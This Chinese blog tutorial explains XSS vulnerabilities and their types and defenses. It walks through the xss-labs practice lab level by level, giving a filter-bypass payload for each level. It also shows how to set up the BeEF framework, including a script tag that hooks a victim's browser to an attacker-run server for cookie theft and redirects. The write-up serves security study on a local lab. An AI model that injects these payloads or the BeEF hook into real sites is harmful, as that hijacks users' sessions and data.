web漏洞-xss漏洞

最新推荐文章于 2023-12-03 22:21:09 发布
最新推荐文章于 2023-12-03 22:21:09 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 渗透测试 小迪安全 文章标签: 前端 xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44312640/article/details/127791065
版权

web漏洞-xss漏洞

文章目录

前言

​ 介绍xss漏洞的产生原因、危害、分类、防护,beef工具介绍及xss漏洞靶场演示等。

xss介绍

什么是xss

​ xss(Cross-site scripting,跨站脚本攻击),指的是攻击者在HTML页面中插入恶意的javascript脚本,这些脚本会在被攻击者浏览页面时执行,实现如cookie获取、键盘监听、密码窃取、页面跳转等功能。

xss漏洞产生原因

​ xss漏洞的产生原因主要是由于代码编写时对参数的输入输出控制不严谨导致攻击者能够通过构建攻击语句作为输入,网页输出显示时便自动执行了攻击语句。

xss漏洞危害

1、网络钓鱼,包括盗取各类用户账号;

2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;

3、劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等;

4、强制弹出广告页面、刷流量等;

5、网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等;

6、进行大量的客户端攻击,如DDoS攻击;

7、获取客户端信息,例如用户的浏览历史、真实IP、开放端口等;

8、控制受害者机器向其他网站发起攻击;

9、结合其他漏洞,如CSRF漏洞,实施进一步作恶;

10、提升用户权限,包括进一步渗透网站;

11、传播跨站脚本蠕虫等;

xss漏洞分类

反射型xss

​ 一般是一次性的攻击,只有在用户访问了攻击者构建的恶意链接后才会被攻击。如一个链接正常访问为https://www.baidu.com/,攻击者构建了恶意访问链接为https://www.baidu.com/?message=script%3Ealert(1)%3C/script%3E,通过message参数进行攻击,用户正常访问百度网站是不会受到影响的,只有点击了恶意访问链接构建了message参数才会被影响

存储型xss

​ 存储型xss指的是攻击者已经将恶意代码存储到了网站服务器上,用户只要访问网站就会受到攻击,如攻击者将恶意代码存储到了https://www.baidu.com/网站上,那么任何用户只要访问https://www.baidu.com/网页就会受到攻击。

DOM型xss

​ DOM型xss指的是攻击者通过修改html网页的dom结构造成的攻击,和反射型xss一样,也是只有当用户访问了恶意链接后才会被攻击,和反射型xss的区别就是反射型xss是服务器返回html页面时就已经包含了恶意脚本,而DOM型xsss在服务器返回html页面时是没有包含恶意脚本的。比如你输入一个字符串后前端代码并没有向后端发起请求,而是直接渲染在页面上造成的xss攻击为DOM型xss,而如果你输入一个字符串后前端向后端发起请求,后端返回的内容带上了恶意代码造成的xss攻击为反射型xss。

xss漏洞防护

​ 由于xss漏洞产生原因主要是由于对输入输出的控制不严谨导致的,因此,在防御时,可以对输入语句作过滤,符合xss攻击特征的输入语句则过滤,如script、onxxx等事件触发函数等。再对输出作转义,如<等字符。

工具介绍

xss平台

​ xss平台是指网上公开的集成了部分xss漏洞payload的平台。使用https://xss.pt/平台演示。

beef

​ beef是一款针对浏览器的渗透测试工具,里面集成了许多payload,我们可以利用它来配合xss漏洞进行攻击,项目地址:https://github.com/beefproject/beef。

主页面介绍
# kali 安装
sudo apt install beef-xss
# 启动
sudo beef-xss
# 停止
sudo beef-xss stop
# 登录默认账号beef,密码启动时设置
使用方法

​ 只要在目标浏览器中注入<script src="http://192.168.237.100:3000/hook.js"></script>语句即可在beef后台连接浏览器。

靶场演示

靶场搭建

​ 使用xss-labs靶场演示,项目地址:https://github.com/do0dl3/xss-labs。搭建直接使用phpstudy工具搭建即可,此处不做演示。

level1

​ 这个关卡直接在name参数中注入xss脚本即可,如图1。将xss语句修改为beff的钩子语句,如图2,此时可以使用beef-xss的模块功能,如cookie获取,页面html代码获取,浏览器重定向等操作。

Level2

​ payload:"><script>alert(1)</script>//

Level3

​ payload:' onclick='alert(1)'

Level4

​ payload: " onclick="alert(1)"#

Level5

​ payload:"><a href="javascript:alert(1)"/>

Level6

​ payload:"><a hRef="javascript:alert(1)"/>

Level7

​ payload:" oonnclick="alert(1)">

Level8

​ payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;,javascript:alert(1)的HTML编码

Level9

​ payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://,javascript:alert(1)编码加上//http://

Level10

​ payload:http://localhost:8086/level10.php?keyword=<script>alert(1)</script>&t_link=111&t_history=222&t_sort="onclick="alert(1)" type="text"

Level11

​ payload:"onclick="alert(1)" type="text",抓包修改http头referer值进行攻击。

Level12

​ payload:"onclick="alert(1)" type="text",抓包修改http头User-Agent进行攻击。

Level13

​ payload:user="onclick="alert(1)" type="text",抓包修改http头Cookie进行攻击。

Level14

​ 本来的网站指向的应该是测试exif xss漏洞的网站,现在网站好像改了,跳过。

Level15

​ payload:localhost:8086/level15.php?src='level1.php?name=<image src=1 onerror=alert(1)>'

Level16

​ payload:<image%0Asrc=1%0Aonerror=alert(1)>

Level 17

​ payload:arg01=a&arg02=b onmouseover=alert(1)

Level 18

​ payload:arg01=a&arg02=b onmouseover=alert(1)

Level 19

​ 考察的是flash xss,flash插件已经不支持了,不看了,可参考:https://blog.csdn.net/u014029795/article/details/103213877,https://blog.csdn.net/qq_38768365/article/details/114043820。

Level20

​ 和19一致,跳过。

总结

​ 挖掘xss漏洞主要是在用户输入网页输出的地方,通过观察网页源代码的方式尝试写入攻击语句,如先闭合再写入语句、使用事件函数、编码等方式。

楓椛
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞类型原理及防御方式_三种xss漏洞防御,2024年最新面试中Handler这些必备知识点你都知道吗
2301_78399639的博客
04-14 978
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
【网络安全---XSS漏洞(1)】XSS漏洞原理,产生原因,以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞
m0_67844671的博客
10-04 4337
一篇文章告诉xss是什么?原理,产生原因,分类以及一些案例
跨站脚本漏洞(XSS)浅析
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-06 1809
一、跨站脚本漏洞概述 1、漏洞概述 XSS漏洞一直是web漏洞中危害比较大的漏洞,在OWASP TOP10中一直是排在前三的。 XSS是一种发生在Web前端漏洞,所以其危害的对象也主要是前端用户。 XSS通常可以用于带钓鱼、前端JS挖矿、获取用户cookie等。甚至结合浏览器自身漏洞可以对用户主机进行控制。 2、攻击流程(窃取cookie) 用户访问XSS页面,触发XSS脚本,服务器返回“带恶意JS的”页面 客户端执行脚本,发送窃取到的cookie 攻击者使用窃取到的cookie伪造用户登录,造成破
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 1937
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
xss漏洞原因以及如何应对
风烟
01-26 9001
场景一:获取URL参数含有脚本执行 比如我们需要获取URL中某个参数,然后输出到页面当中 比如链接是http://xxx?search="><script>alert('xss')</script>这种,我们解析search参数拼接html的之后直接用了这个参数,这个时候浏览器不知道是恶意代码,直接就执行了, <div> xxx: "><script>alert('xss')</script> </div> 这
web渗透—xss之基于DOM漏洞
dongxie_tk的博客
11-14 4615
这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞
web漏洞利用
m0_57934382的博客
05-07 127
首先安装部署好phpStudy+DVWA漏洞演练平台,安装完成后访问http://(本机IP)/DVWA/index.php进入登陆界面登录界面。 其中DVWA的默认用户名是"admin",密码“password”登录。输入用户名密码登录,登陆成功。 登陆后首先将DVWA Security的难度设置为low 密码登陆绕过 打开Brute Force界面,在用户名处输入admin’(使用敏感字符‘),发现程序会报错,随后观察登录系统时地址栏中的sql语句 在用户名密码提交界面上通过注入逻辑.
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
在本文中,我们将深入探讨XSS漏洞的类型、攻击手段以及防范策略。 ### XSS类型 1. **存储型XSS(Persistent XSS)**:恶意脚本被存储在服务器端,并在多个用户访问同一页面时执行。 2. **反射型XSS(Non-...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
web漏洞XSS_TEST漏洞实践练习代码
04-25
Web漏洞中的XSS(Cross Site Scripting)攻击是一种常见的安全问题,主要针对Web应用程序。XSS允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的会话、窃取敏感信息或者执行其他恶意操作。本资源"XSS_TEST漏洞...
[ 常见漏洞篇 ]常见web漏洞总结------XSS跨站脚本漏洞
qq_51577576的博客
12-07 3907
本文简单的总结了一下XSS的知识点 主要是从面试的角度来总结的 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一、XSS形成原因: 二、XSS分类: 1. 反射型XSS 2. 存储型XSS 3. DOM型XSS 1. 被攻击对象的不同 2. 解析位置不同 3. 存储时间不同 三、XXS防御: 1. 输入过滤 2. 输出转义 四、xxs漏洞的利用 1. 测试流程 2. 利用方式: 五、xxs的攻击流程 1. 存储型: ​2. 反射型: 五、...
关于 XSS(跨站脚本漏洞
辉小鱼的博客
09-05 1434
XSS攻击全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
XSS漏洞原理、分类、危害及防御
热门推荐
sherlyn的博客
02-06 2万+
一、XSS原理 XSS全称:跨站脚本(Cross Site Scripting) ,为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合,所以改名为XSS;攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。 通过存在漏洞WEB站点,向客户端交付恶意脚本代码,从而实现对客户端的攻击目的。 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdo
XSS漏洞
qq_52725216的博客
02-18 1508
xss攻击
XSS漏洞原理
weixin_74790320的博客
12-03 412
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!
XSS漏洞原理及防护
暖风吹起云之博客
08-03 2306
介绍xss漏洞原理和基本防护思路。
云服务器上搭建beef-xss
最新发布
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如阿里云、腾讯云等,并创建一个适合你需求的云服务器实例。 2. 安装操作系统:在云服务器上安装一个支持beef-xss的操作系统,常见的选择是Linux发行版,如Ubuntu、CentOS等。 3. 安装依赖软件:在操作系统上安装必要的软件和工具,如Ruby、RubyGems、Node.js等。具体的安装步骤可以参考beef-xss的官方文档。 4. 下载beef-xss:从beef-xss的官方网站或GitHub仓库下载最新版本的beef-xss。 5. 配置beef-xss:根据你的需求,编辑beef-xss的配置文件,设置监听IP地址、端口号等参数。 6. 启动beef-xss:运行beef-xss的启动命令,启动beef-xss服务。 7. 配置防火墙和网络:确保云服务器的防火墙和网络设置允许外部访问beef-xss服务。 8. 测试和使用:使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值